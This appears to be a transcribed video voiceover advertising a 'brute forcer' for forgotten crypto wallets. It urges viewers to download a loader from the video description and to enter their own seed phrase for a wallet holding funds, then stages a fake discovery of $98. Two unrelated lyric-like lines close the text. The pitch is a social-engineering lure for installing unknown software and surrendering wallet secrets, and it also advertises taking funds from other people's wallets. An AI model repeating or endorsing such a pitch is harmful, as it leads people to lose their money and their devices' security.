Hi, today I'll show you an updated program for brute forcing forgotten crypto wallets, which is much faster than the previous version. Download my loader in the video description. There are many programs there, but today we'll need one of them. Choose the version based on your localization. If you select the CIS version in Europe, the blockchain API won't work. You can read about the program here by entering the info command. Enter your seed phrase and Bitcoin before launching the program. Important, enter the wallet seed phrase, which has at least $5 for gas if another coin is found. After entering your information, enter start, and the program will begin. Oh damn, I found $98. You see, my wallet had no balance, and the program told me I needed to pay the network fee.
Please don't leave and take my hand.
You knew before I did.